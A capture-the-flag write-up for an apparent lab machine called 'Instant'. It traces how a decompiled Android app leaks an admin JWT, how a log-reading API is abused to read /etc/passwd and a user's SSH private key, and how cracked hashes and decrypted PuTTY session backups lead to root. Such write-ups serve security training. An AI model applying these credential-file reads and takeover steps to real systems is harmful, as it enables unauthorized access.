Reconnaissance#
- During the initial scan, we identified two open ports:
Port 80 (HTTP) - Web Server
Port 22 (SSH) - Secure Shell
- Upon accessing the web application, we noticed an option to download a mobile app, which was available in two places on the site.
- Clicking on the button initiated a download for an application named instant.apk.
Enumeration#
- To analyze the Android application, I downloaded and used jadx to decompile the Java code.
- While recursive grepping the files
grep -r "instant"I got admin jwt token
- Additionally, I found multiple API endpoints, including a Swagger API documentation page. Definition Swagger UI transforms JSON or YAML files into interactive interfaces that simplify the navigation and testing of endpoints. Its advantages include: Enhanced Interactivity: Allows developers to test methods (GET, POST, PUT, DELETE) and view parameters in real time.
- when I access it I can see all beautiful endpoints.
- Upon accessing the Swagger UI, I could see all the available API endpoints. One particularly interesting endpoint allowed reading system logs. Exploiting this, I was able to read
/etc/passwdand retrieve system user information.
Exploitation#
- By leveraging the API vulnerability, I requested access to shirohige’s private SSH key stored at:
/home/shirohige/.ssh/id_rsa
- After cleaning the key, I used it to log in via SSH:
ssh -i id_rsa -vl shirohige instant.htb
- Got theUser flag
Privilege Escalation#
- While exploring the system, I discovered an SQLite database file named instant.db in:
/projects/mywallet/Instant-Api/mywallet/instance
Upon inspecting the database, I found a table containing usernames and hashed passwords.
The hashes were generated using Werkzeug hashing.
I started cracking the hashes to retrieve plaintext passwords.
Additionally, I found backup files of Putty sessions stored in the /opt directory. These session files contained encoded credentials. By using the SolarPuttyDecrypt tool, I was able to decrypt the stored credentials.
- With the retrieved password, I gained root access.
- Got theRoot flag
Summary#
Initially, my reconnaissance revealed two open ports: 80 (HTTP) and 22 (SSH). Accessing the web server presented an option to download a mobile application, instant.apk. During enumeration, I decompiled the Android application using jadx. By recursively grepping the decompiled code, I uncovered an admin JWT token and several API endpoints, including a Swagger API endpoint. One particularly interesting endpoint allowed reading logs, which I used to view /etc/passwd and identify users. Moving to exploitation, I leveraged the log reading capability to request and obtain the SSH private key for the user shirohige. After some cleaning, I successfully logged in via SSH using this private key and obtained the user flag. For privilege escalation, I discovered an SQLite database file named instant.db in the application’s instance directory. This database contained usernames and Werkzeug-hashed passwords. I proceeded to crack these hashes. Furthermore, I found backups of Putty sessions in the /opt directory. Using the correct password with a tool like SolarPuttyDecrypt, I was able to decode the root password from these session backups. This allowed me to log in as root and retrieve the root flag.
